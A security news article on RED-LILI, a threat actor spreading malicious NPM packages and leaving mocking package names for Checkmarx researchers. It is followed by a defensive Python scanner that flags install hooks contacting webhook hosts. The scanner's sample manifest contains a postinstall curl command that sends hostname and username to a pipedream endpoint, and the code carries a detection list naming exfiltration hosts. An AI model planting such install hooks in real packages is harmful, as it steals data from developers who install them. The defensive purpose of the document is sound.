Researchers probing the attacks have discovered a trail of concealed messages left by a mysterious threat actor.
Checkmarx published a blog article recently about a threat actor known as RED-LILI, who has been spreading malicious NPM packages using automatically created user accounts.
The RED-LILI Tracker was also built by the company to share information about the attacker’s packages with the community.
Recent findings, however, suggest that RED-LILI has reacted to the attention from Checkmarx researchers.
Secret messages

In response to the blog, RED-LILI changed their strategy. The threat actor began leaving messages for the researchers, in addition to attempting to make the malicious packages appear more believable and obfuscating the dangerous code.
These messages were delivered using package names that “deviated from the usual pattern,” such as:
- Dontbelikethat
- Notsobrilliant
- Dontgothereever
- sdontblowthisoff
- heisnotwhatyousee
- shelloboy634
- nosoawesome232
- F**kyouscanner
The researchers found that RED-LILI has slowed and then stopped its burst automation attacks since the initial disclosure. RED-LILI also retired its old domain names and moved to a new one: 22timer[.]ga.
As RED-LILI now explores and distributes cherry-picked packages, each with its own unique evasion technique, the researchers believe the next wave of the attack is still to come.
“However, because they re-use comparable traits (code similarities, same identifying strings, etc.), the attacker’s thumbprint remains,” the researchers found.
“In recent packages, they are doing it while exfiltrating the data they capture to previously unknown addresses on various platforms, such as free webhook providers like pipedream and requestbin,” says the researcher.
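The exfiltration channel described above (install-time scripts posting captured data to free webhook endpoints) is easy to check for before a dependency is installed. The following is an added example, not code from Checkmarx or from the RED-LILI Tracker: it parses a package.json manifest, inspects only the lifecycle hooks npm runs automatically on install, and flags any URL whose host belongs to the providers the article names (pipedream, requestbin) or to the new RED-LILI domain. The exact domain suffixes in the list, the hook names checked, and both sample manifests are assumptions constructed for this example.

```python
import json
import re

# Hosts to flag. The providers are the ones named in the article (pipedream,
# requestbin) plus the domain the article attributes to RED-LILI. The exact
# suffixes are an assumption for this example, not a published indicator list.
FLAGGED_HOST_SUFFIXES = (
    "pipedream.net",
    "requestbin.com",
    "requestbin.net",
    "22timer.ga",
)

# Lifecycle scripts npm executes without the user asking for them.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Pull the host part out of any http(s) URL embedded in a shell command.
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def hosts_in(text):
    """Return the lower-cased hostnames of every http(s) URL found in text."""
    return [m.group(1).lower().rstrip(".") for m in HOST_RE.finditer(text)]


def is_flagged(host):
    """True if host equals, or is a subdomain of, a flagged suffix."""
    return any(host == s or host.endswith("." + s) for s in FLAGGED_HOST_SUFFIXES)


def suspicious_install_hooks(pkg):
    """Return (hook, host) pairs for install-time scripts that contact a flagged host.

    pkg is the parsed package.json dict. Only the install lifecycle hooks are
    examined; ordinary scripts such as "test" run only when invoked explicitly.
    """
    findings = []
    scripts = pkg.get("scripts") or {}
    if not isinstance(scripts, dict):
        return findings
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        for host in hosts_in(cmd):
            if is_flagged(host):
                findings.append((hook, host))
    return findings


# Constructed sample manifests for this example (not real packages).
# The postinstall hook posts hostname and user to a webhook-style endpoint.
SAMPLE_MALICIOUS = json.loads("""{
  "name": "example-pkg-a",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl -s -X POST -d \\"$(hostname):$(whoami)\\" https://eoxxxx.m.pipedream.net/"
  }
}""")

# A benign manifest: the only flagged host appears in a script npm never runs
# automatically, so it is not reported by this check.
SAMPLE_BENIGN = json.loads("""{
  "name": "example-pkg-b",
  "version": "2.3.1",
  "scripts": {
    "postinstall": "node scripts/build.js",
    "test": "curl https://requestbin.com/example-only"
  }
}""")


if __name__ == "__main__":
    for pkg in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        print(pkg["name"], suspicious_install_hooks(pkg))
```

This catches only the case where the exfiltration URL sits directly in a lifecycle hook; a hook that runs `node install.js` moves the URL into a JavaScript file, so a real review also has to read the files those hooks invoke, and obfuscated or base64-wrapped URLs will not match a plain regex at all. The host list is a starting point to extend with the Checkmarx tracker's published indicators rather than a complete one.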